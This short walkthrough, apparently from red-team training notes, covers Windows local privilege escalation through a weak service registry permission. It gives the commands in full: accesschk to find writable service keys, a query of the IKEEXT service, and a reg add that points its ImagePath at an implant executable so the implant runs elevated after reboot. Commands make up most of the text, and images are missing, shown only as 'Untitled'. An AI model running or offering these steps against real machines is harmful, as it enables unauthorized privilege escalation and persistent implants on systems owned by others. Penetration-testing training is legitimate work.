First: query all registries

accesschk.exe -accepteula -wuvskq "HKLM\\System\\CurrentControlSet\\Services" > c:\\rto\\regs.txt

Untitled

Second: Open the file and search for the Word Authenticated

notepad c:\\rto\\regs.txt

Untitled

Notice that the Authenticated Users have all access to the IKEEXT Registry

Third: Let’s query that registry for interesting parameter

reg query HKLM\\System\\CurrentControlSet\\Services\\IKEEXT

Untitled

Fourth: change the Image Path to point to our malicious payload

reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\IKEEXT /v ImagePath /t REG_EXPAND_SZ /d C:\\rto\\lpe\\implant\\implantsrv.exe /f

Untitled

Now once the machine is rebooted we will be elevated